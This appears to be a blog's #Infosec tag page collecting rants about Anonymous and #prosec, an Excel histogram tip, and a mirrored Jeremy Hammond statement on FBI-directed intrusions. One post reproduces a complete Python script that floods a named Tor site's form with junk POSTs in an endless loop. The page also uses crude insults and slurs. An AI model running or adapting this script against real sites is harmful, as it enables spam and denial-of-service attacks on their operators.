Posts for: #Infosec

Information Wars

I saw you casually glancing at me while tweeting on your MacBook Air, sipping slightly on your venti horchatté. You’re judging me for my shitty laptop running crunchbang, my disheveled appearance, and the fact that I’m drinking plain coffee. You’re elite. You’re a part of the hacktivist collective known as “Anonymous”. Or you’re part of the penetration testers who narc on anons because you believe they dilute infosec with garbage.

[]

Ping / Cheap Histograms

Living. That’s what I’ve been busy with. But I think I’m going to share a tidbit of knowledge to the poor kids out there who either aren’t smart enough to pirate a copy of Minitab or aren’t fortunate enough to drop $1500 on statistical analysis software. I’m going to show you how to do binning with Excel (and potentially LibreOffice / OpenOffice).

Excel binning is the easiest. It’s also a great deal more flexible than Minitab.

[]

Hacks by Hammond

I figured I’d mirror this, just in case. It’s already out there, so the powers that be can’t expect to be able to suppress it.

Sabu also supplied lists of targets that were vulnerable to "zero day
exploits" used to break into systems, including a powerful remote root
vulnerability effecting the popular Plesk software. At his request,
these websites were broken into, their emails and databases were
uploaded to Sabu's FBI server, and the password information and the
location of root backdoors were supplied. These intrusions took place
in January/February of 2012 and affected over 2000 domains, including
numerous foreign government websites in Brazil, Turkey, Syria, Puerto
Rico, Colombia, Nigeria, Iran, Slovenia, Greece, Pakistan, and others.
A few of the compromised websites that I recollect include the
official website of the Governor of Puerto Rico, the Internal Affairs
Division of the Military Police of Brazil, the Official Website of the
Crown Prince of Kuwait, the Tax Department of Turkey, the Iranian
Academic Center for Education and Cultural Research, the Polish
Embassy in the UK, and the Ministry of Electricity of Iraq.

Sabu also infiltrated a group of hackers that had access to hundreds
of Syrian systems including government institutions, banks, and ISPs.
He logged several relevant IRC channels persistently asking for live
access to mail systems and bank transfer details. The FBI took
advantage of hackers who wanted to help support the Syrian people
against the Assad regime, who instead unwittingly provided the U.S.
government access to Syrian systems, undoubtedly supplying useful
intelligence to the military and their buildup for war.

All of this happened under the control and supervision of the FBI and
can be easily confirmed by chat logs the government provided to us
pursuant to the government's discovery obligations in the case against
me. However, the full extent of the FBI's abuses remains hidden.
Because I pled guilty, I do not have access to many documents that
might have been provided to me in advance of trial, such as Sabu's
communications with the FBI. In addition, the majority of the
documents provided to me are under a "protective order" which
insulates this material from public scrutiny. As government
transparency is an issue at the heart of my case, I ask that this
evidence be made public. I believe the documents will show that the
government's actions go way beyond catching hackers and stopping
computer crimes.

Jeremy Hammond
[]

Trollercaust: Save the Celebrations

Sleepless, tired, sleepless, tired. I think I’ve managed to smash those words together rather well with my currently screwed up schedule. Alternating between the two is making me rather… Irritable. I’m unable to make good use of the time I’m capable of finding, mostly because I’m too exhausted just as soon as it floats my way.

Blogging aids and abets what little sanity that’s able to manage the minefield that is my brain. Cognition beyond the simplest thoughts- No, rarely may I ascend beyond my own plane. Instead, I’m forced to watch all manner of pig smash words together in faux-English and pretend he’s a higher order animal. Twitter is the favorite, these days, of such swine. Trolls, they like to call themselves. They pretend they know things about social engineering. Condemning works does not equate to engineering. Engineering requires thought, requires building things. Not burning bridges. Yet these condescending assholes burn bridges, taunt, provoke, and when all else fails they flail their arms and scream loudly, “Victim! I’m being victimized! People are harassing me and my children!” No.

[]

Back Burner

I’ve watched “#prosec” and “Anonymous”, and all the douchebags in between, from a distance. It’s hilarious. Having formerly kept up to date with these people, I can tell you that it’s entirely similar watching from afar as it is being involved with communication. It’s all drama. Relentless, redundant, retarded drama. “OMG YOU PICKED A FIGHT WITH SOMEONE I LIKE SO I’M GONNA HACK EVERY MACHINE YOU HAVE BECAUSE I DONT LIEK U”. It’s kindergarten, sans kindergarten teacher. The breakdown is just as hilarious.

[]

#Prosec Attacks on Doxbin

Looks like #prosec is nerdraging on @doxbin. The effects can be seen here. The attack I noticed first was a semi-lame HTTP POST attack that floods doxbin with garbage “dox”. Code here:

#!/usr/bin/python

import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib

times = 1
while 1:
	############DOX############
	doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	dox = hashlib.sha224(doxrand).hexdigest()
	print dox
	#doxrand = picking a random character
	#dox = SHA hashing of the random character defined in doxrand
	##############NAEM###########
	naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	naem = hashlib.sha224(naemrand).hexdigest()
	print naem
	#same as above
	##############

	connection = HTTPConnection("doxbinumfxfyytnh.onion")
	#establishing HTTP conenction to website
	head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
	#constructing the header, so the webserver will respond properly
	parameters = urlencode({"naem" : naem, "dox" : dox})
	#defining the data to be used during POST, note naem and dox refer to the random strings from ealier
	#they must correspond to the ID fields from the web form, otherwise..it won't work
	connection.request("POST", "/post.php", parameters, head)
	#pushing the data to the post function of the php file
	print 'Connection OK...Continuing..'
	print 'Spammed', 
	print times, 
	print 'times!'
	times = times + 1
	time.sleep(30) #in seconds
	#self explanitory

Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash will get things running again soon.

[]

Musings on Information Security

I’ve been thinking a lot lately about the “PsyOPS” and “InfoSec” professionals that are wildly chasing hackers all over the internet. People claim they’re so elite because they’re infiltrating A GROUP THAT ANYONE CAN JOIN, REGARDLESS OF RACE, CREED, OR RELIGION. I guess it’s tacitly not infiltration, as I’m sure some of the “legit” members don’t have the group’s best interest at heart, for various reasons. So if you’re claiming to be “Destroyer of Anonymous”, you fail at life. You’re a fucking loser- an asshat. The reality is that Anonymous is destroying itself. It swells and declines. It will always eliminate parts of itself. Kind of like pruning. No group with such radical and diverse beliefs can remain cohesive. However, all “#prosec” douchebags are typically Republican, Bradley Manning hating government suckups who shit on the first amendment and would love to see all Arab Americans die. These are not generalizations- these fucking nutbags still have sore tits over 9/11. At least, the “twitter vocal” ones are that way. It’s ironic. If you want to gain support for your cause of “hating Anonymous”, wouldn’t you be nicer than a nazi? My guess is “mudsplatter / hubris” is still on the #prosec side of the fence, hunting Anonymous down with PsyOPS and trolling. However, he’s playing good cop at the moment. The minds at Backtrace Security likely discovered that being raging douches from all angles doesn’t get you very far. So riding high on the crest of “namshub.pdf” and the fact that all their dox came from the fallout just before HBGary, they’re trying like Hell to prove they’re actually worth something to the internet, and not just screaming trolls.

[]

Thanks!

Loot!

Thanks, Anonymous Benefactor! Got the package today, you crazy bastard. The shirt is quite suitable. At least this way people don’t even have to check my blog to determine that I’m an Infosec Troll.

I owe you one.

- Red Gingerface

[]